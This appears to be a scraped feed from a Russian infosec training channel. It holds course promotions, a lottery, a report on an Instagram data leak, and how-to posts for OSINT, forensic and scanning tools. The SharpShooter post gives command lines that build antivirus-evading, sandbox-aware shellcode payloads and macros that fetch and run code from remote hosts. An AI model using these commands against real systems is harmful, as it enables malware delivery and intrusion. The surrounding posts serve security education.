Codeby
36.3K subscribers
1.93K photos
95 videos
12 files
7.72K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
📣ПОСЛЕДНИЙ ШАНС! ИТОГИ НОВОГОДНЕЙ ЛОТЕРЕИ CODEBY УЖЕ СЕГОДНЯ!🎁

Сегодня в 21:00 (МСК) определим 10 победителей в прямом эфире!

У вас еще есть время, чтобы войти в число участников на: iPhone 17, Apple Watch, AirPods и подписки HackerLab PRO.

Для этого нужно приобрести любой курс стартующий в 2026 году. Каждая покупка — ваш лотерейный билет.

Розыгрыш: СЕГОДНЯ, 12 января, 21:00 МСК.
Выбрать курс и успеть участвовать
🥇 Для связи с менеджером @CodebyAcademyBot

🔗Ознакомиться с условиями розыгрыша здесь!

Не упустите свой шанс на новогодний подарок от CODEBY! Удачи!

#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍107🔥6👎5
Media is too big
VIEW IN TELEGRAM
🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY — ИТОГИ 🎄

Друзья, спасибо всем, кто принял участие в нашей новогодней лотерее!

Мы рады объявить 10 победителей:

🥇 1 место — iPhone 17
Номер участника: 102

🥈 2 место — Apple Watch
Номер участника: 314

🥉 3 место — AirPods
Номер участника: 307

🎁 4–10 места — подписка HackerLab PRO на 1 месяц
Номера участников:
105
313
300
101
312
303
206


Поздравляем всех победителей! ❤️
Спасибо, что учитесь и развиваетесь вместе с нами!

Что делать победителям?
Пожалуйста, напишите нам в личные сообщения @CodebyAcademyBot в течение 48 часов для получения приза согласно регламенту.

📌 Видео с розыгрышем в посте

Напоминаем: в Академии Кодебай в 2026 продолжается обучение по ключевым направлениям кибербезопасности, а также доступны подарочные сертификаты на курсы — отличный старт в Новом году.

Спасибо, что вы с нами.
До встречи на обучении и в следующих розыгрышах! 😎

#кодебай #розыгрыш #итоги #онлайнобучение #курсыиб #cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥10👍9🎉5😁1
H4X-Tools

H4X-Tools - Набор инструментов с открытым исходным кодом для сбора данных, OSINT и многого другого.

📕Характеристика:
Веб-поиск: Выполняет поиск в Интернете по заданному запросу.
Поиск номера телефона: Ищет номер телефона и возвращает информацию о нем.
Сканер Портов: Сканирует открытые порты по заданному IP-адресу/домену.
Поиск по нику: Пытается найти заданное имя пользователя на многих разных веб-сайтах.
Поиск по почте: Эффективно находит зарегистрированные аккаунты по заданному адресу электронной почты.

💻Установка:
git clone https://github.com/vil/H4X-Tools.git

cd H4X-Tools

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 h4xtools.py

#osint #cybersecurity


➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍107🔥6😁2
📱 В январе 2026 года в медиапространстве появилась новость: произошла утечка данных 17,5 миллионов аккаунтов Instagram*. Однако официальные заявления Meta* и технические детали от экспертов по кибербезопасности раскрывают более сложную картину.

💫Что стало известно из расследования?
Согласно отчету компании по кибербезопасности Malwarebytes, история началась 7 января 2026 года, когда на хакерском форуме BreachForums были опубликованы крупные структурированные файлы (JSON и TXT) с данными. Их происхождение связывают с хакером под псевдонимом «Solonik».
Какие данные были обнародованы:
- Имена пользователей (логины) и полные имена
- Адреса электронной почты
- Международные номера телефонов
- Частичные физические адреса
- Внутренние идентификаторы пользователей (User IDs)
Важно: в утечке не фигурировали пароли пользователей. Эксперты Malwarebytes предполагают, что источником утечки мог быть инцидент, связанный с API Instagram*, который произошел еще в 2024 году.


💫 В ответ на эти сообщения официальный аккаунт Instagram* в X опубликовал заявление:
«Мы устранили проблему, которая позволяла внешней стороне запрашивать письма для сброса пароля для некоторых людей. Не было взлома наших систем, и ваши аккаунты в Instagram защищены. Вы можете игнорировать эти письма — приносим извинения за возможную путаницу».

Таким образом, Meta* не признает факт «взлома» (breach) в классическом понимании, а описывает инцидент как эксплуатацию технической уязвимости в системе восстановления пароля, которая позволяла злоумышленникам массово подтверждать email-адреса, привязанные к аккаунтам.

💫Между версией Malwarebytes (которая говорит о «массовой утечке» данных с форума хакеров) и заявлением Meta* (которое отрицает взлом и говорит об устраненной уязвимости) есть явное противоречие. На данный момент Meta* не предоставила официального разъяснения о том, как именно данные оказались на BreachForums, и не подтвердила масштабы потенциально затронутых пользователей.

*Компания Meta, а также её продукты (Instagram) признаны экстремистскими в России

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
12👍9🔥7
📱 Mobile Verification Toolkit (MVT) 📲📲

Набор утилит для упрощения и автоматизации процесса сбора данных для криминалистической экспертизы, которые помогают выявить потенциальную компрометацию устройств на базе Android и iOS.


⚙️ Установка
Поддерживает установку из исходного кода или из PyPI:
python3 -m venv env
source env/bin/activate
pip install mvt
#OR
pipx install --force git+https://github.com/mvt-project/mvt.git


Использование
MVT предоставляет две команды mvt-ios и mvt-android.
1️⃣ IOS
Для начала работы необходимо создать резервную копию iTunes. Хотя резервные копии содержат лишь часть файлов, хранящихся на устройстве, во многих случаях этого может быть достаточно, чтобы обнаружить некоторые подозрительные артефакты.
После получения зашифрованной резервной копии необходимо сначала расшифровать ее.
mvt-ios decrypt-backup [OPTIONS] BACKUP_PATH


Запуск mvt-ios на резервной копии.
mvt-ios check-backup --output /path/to/output/ /path/to/backup/udid/

Эта команда создаст несколько файлов JSON, содержащих результаты извлечения.

2️⃣ Android
Поскольку вредоносные атаки на Android обычно осуществляются через вредоносные или бэкдорные приложения, первое, что следует сделать, — это извлечь и проверить все установленные пакеты Android и быстро определить, какие из них являются вредоносными или нетипичными с помощью таких сервисов, как VirusTotal.
mvt-android download-apks --output /path/to/folder
MVT_VT_API_KEY=<key> mvt-android download-apks --output /path/to/folder --virustotal


Кроме того, с помощью Android Debug Bridge (adb) можно получить дополнительную диагностическую информацию с телефона. Чтобы проверить устройство Android через adb, сначала необходимо установить Android SDK Platform Tools. Самый простой способ проверить устройство — подключить его через USB. Необходимо включить отладку по USB и подключить устройство к компьютеру.
mvt-android check-adb --output /path/to/results


#android #ios #forensic #tools

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍157🔥5
🔔 Хотите понять, как проходит WAPT — тестирование на проникновение? Сегодня разберем это подробнее!

Освойте WAPT на практике — старт курса по тестированию веб-приложений на проникновение 22 января!

#WAPT #XSS #OWASP

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥85
🎓Web Cache Vulnerability Scanner (WCVS)

Быстрый и универсальный CLI-сканер для обнаружения уязвимостей отравления веб-кэша (web cache poisoning) и обмана веб-кэша (web cache deception).

Сканер поддерживает множество различных техник отравления и обмана веб-кэша, включает встроенный краулер для обнаружения дополнительных URL-адресов для тестирования, а также способен адаптироваться к конкретному веб-кэшу для более эффективного сканирования. Инструмент обладает широкими возможностями настройки и легко интегрируется в существующие CI/CD-пайплайны.

Установка
1️⃣Готовые двоичные файлы WCVS доступны на странице релизов.
2️⃣ Kali Linux: apt install web-cache-vulnerability-scanner.
3️⃣ Установка с помощью Go: go install -v github.com/Hackmanit/Web-Cache-Vulnerability-Scanner@latest.

⌨️Использование
Инструмент обладает широкими возможностями настройки с помощью флагов. Многие флаги могут содержать непосредственно значение или путь к файлу.

😳 Единственный обязательный флаг -u/--url — указывает на целевой URL-адрес, который необходимо проверить на предмет отравления/обмана веб-кэша. Целевой URL-адрес может быть указан в разных форматах.

Для проверки половины методов WCVS нужны два списка слов: один со словами из заголовков, а другой — со словами из параметров. Списки слов могут находиться в том же каталоге, из которого запускается WCVS, или быть указаны с помощью флагов --headerwordlist/-hw и --parameterwordlist/-pw.

wcvs -u https://example.com
wcvs -u https://example.com -hw "file:/home/user/Documents/wordlist-header.txt" -pw "file:/home/user/Documents/wordlist-parameter.txt"


📝Создание отчета в формате JSON
Если установлен флаг --generatereport/-gr, после сканирования каждого URL-адреса создается и обновляется отчет в формате JSON. Отчет, как и файл журнала, записывается в тот же каталог, из которого запускается WCVS. Чтобы изменить каталог для всех выходных файлов, используйте --generatepath/-gp.

👀Поиск URL-адресов для сканирования
Для обхода URL-адресов необходимо установить --recursivity/-r. Он определяет, на какую глубину рекурсии должен заходить поисковик. По умолчанию WCVS выполняет обход только URL-адресов того же домена.
Для обхода других доменов также можно использовать --recdomains/red. Можно использовать --recinclude/-rin только для обхода URL-адресов, которые наследуют определенную строку. --reclimit/-rl ограничивает количество обходимых URL-адресов для каждой глубины рекурсии.
wcvs -u https://example.com -r 5 -red /home/user/Documents/mydomains.txt
wcvs -u https://example.com -r 5 -rl 2


Флаги для заголовков, параметров, cookie и других данных
🔴--cacheheader/-ch - указывает на пользовательский заголовок кэша, который будет проверяться на наличие совпадений и промахов в кэше;
🔴--setcookies/-sc - указывает на файлы cookie, которые должны быть добавлены в запрос;
🔴--setheaders/-sh - указывает на заголовки, которые должны быть добавлены в запрос;
🔴--setparameters/-sp - указывает на параметры, которые должны быть добавлены в запрос. Хотя их можно просто добавить в URL, в некоторых случаях может быть полезнее добавить их с помощью этого флага;
🔴--post/-post - меняет HTTP-метод с GET на POST;
🔴--setbody/-sb - указывает на тело, которое должно быть добавлено в запрос;
🔴--contenttype/-ct - указывает на значение заголовка Content-Type;
🔴--useragentchrome/-uac меняет User-Agent.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#WCVS #websecurity #кеширование
Please open Telegram to view this post
VIEW IN TELEGRAM
👍148🔥5
PH0MBER

PH0MBER — это платформа OSINT, представляющая собой универсальный инструмент для сбора информации и проведения разведки.
Это может помочь вам собрать информацию (например, номера телефонов, IP-адреса, данные о доменных именах и т. д.) из различных общедоступных источников о целевом объекте.
Утилита похожа на MetaSploit Framework по внешнему виду и управлению. Программа не обладает большим или сложным функционалом и подойдёт даже новичкам.

📕Характеристика:
1️⃣Поиск по номеру телефона
2️⃣Поиск по IP-адресу
3️⃣Поиск по MAC-адресу
4️⃣Поиск информации через whois
5️⃣Поиск по имени пользователя

📌Установка:
git clone https://github.com/s41r4j/phomber.git

cd phomber

pip3 install mac-vendor-lookup


💻Использование:
python3 phomber.py

Поиск по номеру телефона:
phone <NUMBER>

Поиск информации с whois:
whois <DOMAIN>


#OSINT #tools

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍9🔥7
Защита от прослушки: практический взгляд без мифов

Средства негласного получения информации давно вышли за пределы спецслужб.
Диктофоны, радиопередатчики, BLE-трекеры и модифицированные устройства свободно доступны и регулярно используются в мошенничестве, корпоративных конфликтах и бытовых инцидентах.

Понимание принципов их работы — базовый навык для специалистов по безопасности, OSINT и технической разведке.

Мы подготовили PDF-гайд
«Инструкция: защита от популярных методов прослушки» — авторский материал от эксперта OSINT.

В гайде разобрано:

🟧 классификация устройств скрытого наблюдения: записывающие и транслирующие
🟧 диктофоны, радиожучки, GSM/LTE-трекеры, BLE/UWB-метки и нестандартные решения
🟧 ключевые демаскирующие признаки: питание, радиоканалы, конструктив
🟧 методы обнаружения: визуальный контроль, радиомониторинг, анализ спектра
🟧 практические способы противодействия в быту, офисе и автомобиле

Материал ориентирован на реальные сценарии, без художественных допущений и маркетинговых преувеличений.

➡️Скачать гайд бесплатно
https://wipro-guide.codeby.school/

Гайд будет полезен:
специалистам ИБ и OSINT
техническим и управленческим сотрудникам
тем, кто работает с чувствительной информацией

В конце гайда — рекомендации по дальнейшему профессиональному развитию в области разведки и анализа данных.

➡️Перейти к гайду
https://wipro-guide.codeby.school/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥65👎1😐1
🔍 rnsec — это лёгкий сканер безопасности для React Native и Expo‑приложений, который ищет уязвимости, секреты и ошибки конфигурации до выхода в прод. Утилита работает из коробки одной командой, полностью локально и отлично подходит для встраивания в CI/CD.

⚙️ Основные возможности rnsec

➡️ Анализирует исходники мобильных приложений на React Native и Expo с учётом их типичных паттернов и анти‑паттернов.
➡️ Покрывает Android и iOS, включая платформенные настройки и конфиги (сетевые политики, storage и др.).
➡️ Детектирует небезопасное хранение данных (например, чувствительные данные в AsyncStorage), HTTP‑трафик без шифрования, слабую аутентификацию, рискованные WebView‑настройки и прочие misconfig‑ошибки.
➡️ Использует разбор AST (Abstract Syntax Tree) вместо простого поиска по строкам, что уменьшает шум и ложные срабатывания.
➡️ Генерирует HTML‑дашборд с удобной навигацией по находкам и JSON‑отчёты для автоматической обработки.


⬇️ Установка и запуск
rnsec распространяется через npm как глобальная CLI‑утилита.
npm install -g rnsec


🗓️ Базовый запуск
Перейди в каталог React Native или Expo‑проекта и запусти сканирование.

cd /path/to/your-react-native-app
rnsec scan

Эта команда:
- находит релевантные файлы проекта;
- прогоняет 68+ правил безопасности;
- формирует HTML‑ и JSON‑отчёты, а также краткую сводку в консоли.

🔧 Примеры использования
- Скан текущего проекта с отчётами по умолчанию:
rnsec scan


- Скан конкретного пути:
rnsec scan --path /Users/dev/my-react-native-app


- Кастомные имена отчётов (HTML + JSON):
rnsec scan --html security-report.html --output security.json


#react #scan #cicd #tool

Все наши каналы 💬Все наши чаты Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍118🔥6
Unicornscan: Высокоскоростной асинхронный сканер для сетевой разведки

Unicornscan — это асинхронный инструмент для сетевой разведки и аудита безопасности, предназначенный для быстрой доставки сетевых стимулов и записи ответов. Его ключевое отличие от традиционных сканеров (таких как Nmap) — асинхронная, масштабируемая архитектура, позволяющая достигать высокой скорости сканирования (25.000+ пакетов в секунду), что делает его отличным выбором для обследования больших сетей.


🔘 Ключевые особенности и преимущества
- Отдельные процессы для отправки и прослушивания пакетов позволяют достигать высокой скорости и эффективности
- Поддержка TCP (SYN, ACK, FIN, NULL, XMAS, произвольные флаги), UDP, ICMP, ARP-сканирования и составных режимов
- Встроенная поддержка сигнатур p0f v3 для анализа характеристик TCP/IP стека и определения операционной системы удалённого хоста (более 50 отпечатков)
- Возможность эмулировать поведение TCP/IP стека различных ОС (Linux, Windows, macOS и др.) при отправке пакетов для обхода простых систем обнаружения
- Для UDP-сканирования может отправлять специфичные для служб пакеты (DNS, HTTP, SIP, SSDP), повышая точность обнаружения

➡️ Установка
sudo apt install unicornscan

Проверка
unicornscan -h


➡️ Базовый TCP SYN-скан
sudo unicornscan -mT -p 1-1024 -I -E -vvv 192.168.1.100

Команда выполнит подробное TCP SYN-сканирование портов с 1 по 1024 на хосте 192.168.1.100 с немедленным выводом в реальном времени, обработкой всех типов ответов (открытые, закрытые, фильтруемые порты) и максимальной детализацией технических параметров сетевых пакетов

➡️ Быстрый порт-сканинг с указанием интерфейса и TTL
sudo unicornscan -i eth0 -r 2000 -t 64 -p a 10.0.0.0/24

Команда выполнит быстрое сканирование всех 65 тысяч портов на всех хостах в сети 10.0.0.0/24, используя сетевой интерфейс eth0, со скоростью 2000 пакетов в секунду и значением TTL 64 для маскировки под стандартный Linux-трафик

➡️ TCP-сканирование с записью трафика для последующего анализа
unicornscan -mTsFPU -s r -w scan_capture.pcap -p 22,80,443 192.168.1.50

Команда выполнит нестандартное TCP-сканирование с флагами FIN, PSH и URG (без SYN) портов 22, 80 и 443 на хосте 192.168.1.50, используя случайные исходные порты и сохраняя все полученные ответные пакеты в файл scan_capture.pcap для последующего сетевого анализа

➡️ Ограничения
- Unicornscan создан для быстрого сбора данных (открытые порты, живые хосты, ОС). Он не заменяет полноценные сканеры уязвимостей или сложные скриптовые движки, такие как у Nmap
- Интерпретация вывода, особенно в детальном режиме, требует понимания сетевых протоколов
- Для сканирования интернет-хостов составные режимы с ARP (-mA+...) не работают, так как требуют нахождения в одном широковещательном домене (L2)

#tools #audit #scanner #TCP #UDP #SYN

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍6🔥6
Codeby pinned a photo
Сегодня ИБ — это не только политики и регламенты, но и автоматизация.
Python помогает решать задачи эффективнее и масштабнее.

Какие библиотеки используете вы? Пишите в комментариях ⬇️

Для тех, кто только начинает свой путь в автоматизации ИБ, отличным стартом станет курс «Основы программирования на Python». Начните обучение 19 января.

#python #автоматизация #libs

Все наши каналы 💬Все наши чаты Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥116🤗4👍3👎1
🦈 SharpShooter

Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.

Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.

Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.

Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.

⚡️ Установка
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt


🦇 Использование
1️⃣Создание JavaScript-полезной нагрузки без этапов выполнения, ориентированной на версию 4 платформы .NET. В данном примере создаётся полезная нагрузка с именем foo.js в выходной директории. Шелл-код считывается из файла ./raw.txt. Полезная нагрузка пытается обеспечить обход песочницы путём привязки выполнения к домену CONTOSO и проверки на наличие известных артефактов виртуальных машин.
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3


2️⃣Создаётся VBS-полезная нагрузка, которая осуществляет доставку как через Web, так и через DNS. Полезная нагрузка попытается загрузить сжатый C#-файл, выполняющий шелл-код в файле csharpsc.txt.
SharpShooter.py --payload vbs --delivery both --output foo --web https://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4


3️⃣Далее показано, как создать промежуточную полезную нагрузку JS, которая выполняет веб-доставку и получает полезную нагрузку с https://www.phish.com/implant.payload. Сгенерированная полезная нагрузка попытается обойти песочницу и скомпилировать полученную полезную нагрузку.
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl https://192.168.2.8:8080/foo.xsl


4️⃣Создаётся макрос VBA, который использует COM-интерфейс XMLDOM для получения и выполнения размещённой таблицы стилей.
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl https://192.168.2.8:8080/foo.xsl


P.S. Используйте этот инструмент только в образовательных целях!

#tools #payload #SharpShooter

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍6🔥5
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!

🕵️ Категория ФорензикаСледопыт

🎢 Категория РазноеAPT

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥76